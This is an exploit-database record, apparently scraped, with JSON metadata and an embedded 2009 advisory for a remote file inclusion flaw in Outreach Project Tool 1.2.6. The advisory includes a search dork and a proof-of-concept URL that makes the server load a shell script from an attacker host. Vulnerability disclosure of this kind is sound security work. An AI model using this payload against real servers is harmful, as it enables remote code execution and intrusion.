outreach project tool 1.2.6 - Remote File Inclusion

2009-11-24T00:00:00

Description

{"id": "EDB-ID:10218", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "outreach project tool 1.2.6 - Remote File Inclusion", "description": "", "published": "2009-11-24T00:00:00", "modified": "2009-11-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/10218", "reporter": "cr4wl3r", "references": [], "cvelist": ["2009-4082"], "immutableFields": [], "lastseen": "2022-08-16T09:22:54", "viewCount": 12, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1661182887, "score": 1661184847, "epss": 1678791570}, "_internal": {"score_hash": "1f186949eedbf40a043a2c43f769c009"}, "sourceHref": "https://www.exploit-db.com/download/10218", "sourceData": " [ Discovered by cr4wl3r \\ Indonesian Hacker ]\r\n\r\n########################################################################\r\n# OPT (Outreach Project Tool) <= 1.2.6 [CRM_path] Remote File Include Vulnerability\r\n# Download Script : http://sourceforge.net/projects/outreach\r\n# Dork : \"Adhan Handsome\" :D\r\n########################################################################\r\n#\r\n# Vuln : ./OPT_1-2-7_MAX/opt/forums/Forum_Include/index.php (line 10)\r\n# <?php\r\n# include \"$CRM_path/forums/Forum_Include/forum_admin.inc\";\r\n# ?>\r\n# PoC : http://server/[path]/forums/Forum_Include/index.php?CRM_path=http://[attacker]/shell.txt???\r\n#\r\n#\r\n#\r\n########################################################################\r\n# Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,\r\n# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*\r\n########################################################################\r\n\r\n/##############################################\\\r\n# all member at sekuritionline.net #\r\n# all member at manadocoding.net #\r\n\\##############################################/\r\n\r\n# Contact Me : cr4wl3r[4t]linuxmail[dot]org\r\n\r\n [ Gorontalo / 2009 ] ", "osvdbidlist": ["60464"], "exploitType": "webapps", "verified": true}